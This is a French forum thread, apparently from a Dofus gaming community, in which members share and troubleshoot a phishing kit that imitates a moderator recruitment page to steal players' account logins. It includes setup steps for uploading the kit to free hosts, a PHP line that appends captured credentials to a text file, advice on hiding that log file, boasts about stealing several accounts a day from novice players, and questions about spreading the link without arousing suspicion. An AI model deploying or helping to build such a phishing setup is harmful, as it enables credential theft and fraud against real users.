pishing recrutement modérateur

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

Askilien

Membre
Feb 3, 2011
93
0
431
Merci du partage ! Tu pourrais me dire qu'elle est ton hébérgeur s'il te plait ?
 

iinfar

V
Jan 14, 2011
705
1
924
38
Sous une barre
Salut,
Merci vraiment merci pour ton pack !

J'ai finalement réussi à m'en sortir, mais impossible d'accéder au fichier contenant les comptes...
En fait, je ne peux pas transférer le fichier texte renommé.
Y aurait-il une solution ? Merci

J'ai trouvé d'où cela venait : je ne peux pas supprimer un dossier, fruit de mon premier essaie, qui contient Comptes.txt. (j'utilise FileZilla, je fais supprimer mais rien ne se passe !)
Cependant sur mon site je ne peux pas accéder aux comptes via ce dossier mais via celui que j'ai configuré, sauf qu'aucun comptes ne s'inscrit dedans, vous me suivez ...?

Help :svp:


C'est bon, ça marche !
Merci !
 

iinfar

V
Jan 14, 2011
705
1
924
38
Sous une barre
J'aurai encore une petite question ;
Comment faites-vous circuler le site ? Le lâcher comme ça dans le canal publique c'est suspect, non ?


Il n'y a également aucune moyen pour modifier le .tk en .fr par exemple ?
 

shanons

Membre actif
Jan 22, 2011
227
0
922
44
Merci j'vais essayer de faire un phishing ^^

PS : C'est quoi le bouton merci j'le vois pas ><

PS² : C'est quoi ton phishing?

shan'
 

XxL3f4xX

Nouveau membre
Jan 22, 2011
3
0
421
34
Le lien ne marche pas (meme sur google chrome ou internet explorer ou firefox) , stp remet un lien neuf :)
 

phylonia

Membre Banni
Aug 4, 2010
392
0
441
54
Devant mon écran
Aminous ce phishing est un phishing ayant 1page de plus, et customisé du miens créer il y à exactement 1ans passer.

Ce phishing ne marche que pour lvl >20 à <40
 
non mon chers phylonia se pishing marche sure mon serveur mylaise et il marchera toujours pour les "noob" :) je chope des lvl 130 a 60 X) si ta mieux pour le moment apare celui des cadeaux ou j'ai choper que 10 personne en 1 semaine le pishing modération me rapporte 5 a 10 personne pare jours sa dépend le nombre de "noob" connecter :)
 

phylonia

Membre Banni
Aug 4, 2010
392
0
441
54
Devant mon écran
Il pue le phishing toute façon le phishing est pour ceux qui savent rien faire :)

C'est comme si tu voler le gouter des petits de maternelle ...
 

iinfar

V
Jan 14, 2011
705
1
924
38
Sous une barre
Il pue le phishing toute façon le phishing est pour ceux qui savent rien faire :)

C'est comme si tu voler le gouter des petits de maternelle ...

Tu critiques encore ! T'en a pas marre ?

Stp, quand tu passes sur des sujets, si c'est pour critiquer passe ton chemin. Tu deviens vraiment désagréable !

@ Aminous : J'ai mis que j'ai résolu mon problème, j'aimerai juste savoir comment vous diffusez votre site sur Dofus.
 

Viirus22

Membre
Jul 24, 2010
65
0
431
44
Voila j ai tous bien fais j ai up le site sur un hébergeur tous sa mais quand je me connecte sur le site sa me connecte tous sa mais apres quand je regarde dans mon fichier txt il y a rien d écrit comme pseudo ou mot de passe comment ça se fait help s il vous plait merci
 

iinfar

V
Jan 14, 2011
705
1
924
38
Sous une barre

kml56css

Membre
Oct 4, 2010
72
0
431
29
C'est bien beau de parler phylonia mais si tu a une meilleur page fait le savoir ...
 

furies

Nouveau membre
Feb 25, 2011
1
0
421
44
voila vu que j'ai retrouver le pishing qui ma fait raporter des somme et des somme :) je le fait partager avec vous se pishing consiste a faire croire a la victime que vautre serveur recrute des neauveux modérateur :) vous pouver aller voir mon pishing pour vous donner une idée : enlever pour avoirs flood des connerie dessu
en image :)

en haut

59468067.png


milieux

48199113.png


bas

60869651.png


Identification de la victime :)

40835120.png


avant d'être rédiger sure le site officielle (Dofus)

73659077.png


Scan VirusTotal :Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

ne faites pas attention au 1/42 le scan à apparemment foiré...

Lien sharemirror (multiupload) : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

ATTENTION

je suis sous mozilla et j'arrive pas a avoirs le lien megaupland on me rédiger toujours sur sharmiroir donc utiliser internet explorer :) si sa marche pas sous mozilla


INSTALLATION :
Procédure habituelle, décompressez le, uploadez le sur votre serveur distant avec FileZilla ou autre...

PERSONNALISATION :
Pour changer le nom du fichier Comptes.txt vous devez aller dans Pack recrutement Puis modifiez comme ceci :

Modifier le nom du fichier Comptes.txt en ce que vous voulez.


Ouvrez etape2.php et etape3.php avec bloc notes ou notepad++ par exemple.
Cherchez la ligne
Code:
$h = fopen("../Comptes.txt", "a");

et remplacez "Comptes.txt" par ce que vous voulez ce qui donne :

packphish1.jpg


PUIS

packphish2.jpg


EDITE POUR CE QUI N'arrive pas a telecharger sous le lien sharmiroir désole donc je vous et fait un lien Mu

LIEN MU

Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

sa viens de mon pc :) donc il sera dispo tout le temps je crois >_<
merci j'ais compris le truc sur la personnalisation mais pour uplauder j'ais un peut du mal si une personne pourrais m'aider sa serais sympa
 

Viirus22

Membre
Jul 24, 2010
65
0
431
44

iinfar

V
Jan 14, 2011
705
1
924
38
Sous une barre

Viirus22

Membre
Jul 24, 2010
65
0
431
44
Normalement tu attends une ou deux minutes et tu y a accès. (Aux identifiants)
Ben moi j ai rien reçu quand je vais voir dans dossier php/comptes.txt tu peux m expliquer tout le détail pasque moi sava comme quand tu va sur ta page pishing ce que tu fais ect sa me serais bien utile :D explique étapes par étapes si sa te derange pas de m expliquer je te serais reconnaissant

C est bon j ai trouvé j ai rien dis merci :D merci quand même iinfar

---------- Message ajouté à 00h07 ---------- Le message précédent était à 23h58 ----------

Ben moi j ai rien reçu quand je vais voir dans dossier php/comptes.txt tu peux m expliquer tout le détail pasque moi sava comme quand tu va sur ta page pishing ce que tu fais ect sa me serais bien utile :D explique étapes par étapes si sa te derange pas de m expliquer je te serais reconnaissant

C est bon j ai trouvé j ai rien dis merci :D merci quand même iinfar
Par contre tu a pris quelle hébergement est t il gratuit? moi c est cpanel.hosting.olikeopen.com marche niquel et est gratuit :D
 

leojore

Membre Banni
Oct 15, 2010
367
0
441
27
sur mon ordi
recrutement-mj.t35.com
moi j'ai t35.com comme hébergeur

---------- Message ajouté à 08h33 ---------- Le message précédent était à 08h28 ----------

Modifier le nom du fichier Comptes.txt en ce que vous voulez.


Ouvrez etape2.php et etape3.php avec bloc notes ou notepad++ par exemple.
Cherchez la ligne
Code:
$h = fopen("../Comptes.txt", "a");


sa sert a quoi?

---------- Message ajouté à 09h03 ---------- Le message précédent était à 08h33 ----------

moi j'ai un problème c'est que je me suis connecter avec un compte a moi sur mon site de pishing et rien dans le bloc note comptes.txt pourquoi??
 
Alors alors chercher la ligne compte .txt permet au voleur de site de pishing de pas voir les compte que vous venet de voler vous le remplacer pas un petite mot comme vautre pseudo ensuite si tu na pas reçu de comptes c'est par ce que tu la pas asse bien flood ou que tu et partie au mauvaise endroit il faut que quand tu et sure ton site après le /tu mes se que tu a mit dans l'étape 1 et l'étape deux des fichier bloc note et la ta liste sera visible de deux si tu arrive pas a accéder a ta liste va sur ton site et met n importe quoi comme ID et après tu va voir ta liste si sa apparait c'est que tu a pas fait de victime voila c'est tout